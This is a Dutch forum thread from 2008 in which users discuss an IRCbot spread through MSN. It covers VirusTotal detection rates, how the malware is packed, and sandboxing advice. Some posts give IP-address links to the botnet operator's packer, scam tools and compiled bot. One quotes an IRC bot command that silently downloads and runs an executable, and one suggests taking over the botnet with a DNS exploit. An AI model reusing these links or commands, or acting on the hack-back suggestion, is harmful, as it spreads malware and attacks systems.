Hoi,

Misschien een variant...
maar hier staat de fix..
http://forums.techguy.org/malware-removal-hijackthis-logs/627195-cant-delte-msn-photo-exe.html

gr
callie

Het gaat hier om een bekend virus wat bekend staat als IRCbot en dit word ook gewoon herkend door een virusscanner.

File has already been analysed:
MD5: 4bc0aef6db6a79689d7c1467d2bb4c7c
First received: 12.13.2008 08:16:41 (CET)
Date: 12.15.2008 22:08:29 (CET) [<1D]
Results: 14/38
Permalink: http://www.virustotal.com/analisis/d3b0767e7c7f3a05c1746a7e83584327

Dus na 2,5 dag nog maar 14 van de 38 die hem detecteren. Toegegeven de als wat beter bekend staande scanners wel, maar nog geen detectie door o.a. AVG, ClamAV, Comodo, eSafe, F-Prot, F-Secure, Norman, Panda, PCTools en TrendMicro.

[Update 15-12-'08 22:39: niet-meer-werkende url verwijderd]

Tjaa.. HighTechCrime maakt zich geen zorgen omdat de botnetbeheerder geen Nederlander is.. Ben in de IRC kanaal geweest. Er zijn gewogen 30K + bots aanwezig, en op ieder bot wordt er een fake antivirus noticer geinstalleerd.

Het is wel intressant wat voor informatie je kunt vinden in een IRC kanaal, zo is de eigenaar een scriptkiddie die zich bezig houdt met scamming en overige hack activiteiten. Wel is hij belijkbaar niet intiligent genoeg

Zou zeggen download EtherDetect, run vmware maak aantal snapshots, run de rBot en zie de informatie. Als er download requesten worden gedaan.. zoals http://xx.xx.xx.xx/map/bestand.exe ga naar de root van de website en zie alle broncodes, scam tools, bots, cc gegevens, en overige illegale handel. Hopelijk gaat iemand wel aangifte doen, zodat EINDELIJK de SCHULDIGE persoon wordt opgepakt niet de coder van de bots maar de misbruiker ervan!

Laat de Recherche maar lekker werken tijdens de kerst dagen.

Dit werkte ook: http://site.facebooky.net/viewimage.php (email adres was dus irrelevant), maar ondertussen is de hele site uit de lucht gehaald.

Gisteravond meteen een mailtje naar Yahoo gestuurd (en een autoresponse ontvangen); vanavond een persoonlijke reply dat ze de zaak zouden onderzoeken - of mijn mailtje aanleiding tot het uit de lucht halen is geweest weet ik niet maar zulke bronnen (met 8 IP-adressen via akadns.net) zijn erg "betrouwbare" malware verspreiders.

@Spirit: de malware zit gewoon verpakt in een self-extracting CAB-archive, de info die je vermeldt zegt dus niet zoveel. In de cab file zit overigens een bestand genaamd bur.exe dat met een custom-made packer lijkt te zijn gebouwd (met MS Visual C). Of het daadwerkelijk om een IRC-bot gaat weet ik niet.

Ik heb deze file ook maar even aangeboden (als bur.malware) bij Virustotal met in eerste instantie het volgende resultaat:

MD5: 28ccaace5d67c19617b342ef7f3c1556
First received: 12.13.2008 15:45:59 (CET)
Date: 12.15.2008 20:10:32 (CET) [+1D]
Results: 12/38
Permalink: http://www.virustotal.com/analisis/1c20aa72ce8be94cfddf0f6b2b114a89

Daarna heb ik heb de malware opieuw laten scannen met nu 18/38 als resultaat. T.o.v. de in bovenstaande link getoonde URL (die de resultaten van de gisteravond toont) is er detectie bijgekomen door AhnLab-V3, AVG, DrWeb, F-Secure, Panda en Sophos.

Weer het zoveelste bewijs dat alleen een virusscanner onvoldoende beveiligt, en dat het dagen duurt voordat vermoedelijk flink veel verspreide malware wordt gedetecteerd.

Princ is de owner van de botnet met een beetje googlen heb ik de ss gevonden http://img410.imageshack.us/img410/8619/botnetgu1.jpg inmiddels 40K geworden .. eyy waarom wordt het niet afgesloten? die amerikanen mogen echt alles..

Oke kom steeds met nieuwe shit aan

http://75.126.252.200/~hi5euc/ <-- kijk is daar zijn de bestandjes o.a. zijn packer waarmee hij het "undetected" maakt
http://72.10.169.26 <-- scam tools and source codes

zat beetje in mijn log file history te checken

<timeout> .login version -s
<timeout> .p.princii http://75.126.252.200/~hi5euc/bluz.jpg c:\bluz.exe 1 -s

download cmd is vervangen door p.princii

volgens mij was de hostauth @aa.aa

wie er zin in heeft en een linux OS draait floodem met DNS exploit neem die botnet over ;)

Oepzz sorry het is princ = crim = pr1nc, een albanees geen Amerikaan eyy krijg ik een lindje of wat? zodra ik 10000 euro beloning krijg vertel ik dingen waarmee ik jullie ga shockeren

dat is natuurlijk allemaal nergens op gebasseerd. En gewoon van google geplukt
http://74.125.77.132/search?q=cache:ZLHykBOSMlYJ:unkn0wn.ws/board/viewtopic.php%3Ff%3D118%26t%3D4482%26start%3D180+%22screenshot%27s+of+your+net%22&hl=nl&ct=clnk&cd=1&gl=nl

Is er iemand die weet hoe je in Internet Explorer of Firefox het download kan uitschakelen "download ". Als je je computer deeld met kinderen of je buurvrouw dan wil je graag dat wanneer je thuis komt dat je computer nog intact is! Het risico van MSN is dat jbijvoorbeeld je vriendin of je vrienden besmet zijn met spyware of zeer gevaarlijk virus! ,En jij vetrouwd je vriendin wel vetrouwd, dus als zij jou een bijlagen sturen ga jij die direct openen!

http://72.10.169.26/exp/viewimage.php hier is de bron code... zodra je klikt wordt je IP adres opgeslagen in hits.html

http://72.10.169.26/exp/tools.zip <- incl. compiled bot.exe en viewimages.php source.

btw niet naar de output files kijken daar zit illegale informatie in :\

Je zou iets als Sandboxie kunnen gebruiken om je applicatie in een aparte zandbak te draaien, waar het (vooralsnog) niet uit kan breken.
Start MSN Messenger op in Sandboxie en vervolgens worden alle applicaties die door MSN gestart worden ook in een zandbak gestart. Heeft natuurlijk geen nut als mensen links gaan kopieren... Dan moet je ook je browsers gaan zandbakken.

ik heb dat programma dus geopend....en nu kan ik niets meer op mijn pc, niet meer bij mijn programmas, niet meer op internet, helemaal niets werkt meer..

iemand tips

-s is silent dus de bot geeft geen response ;) check de source maar alles is publiek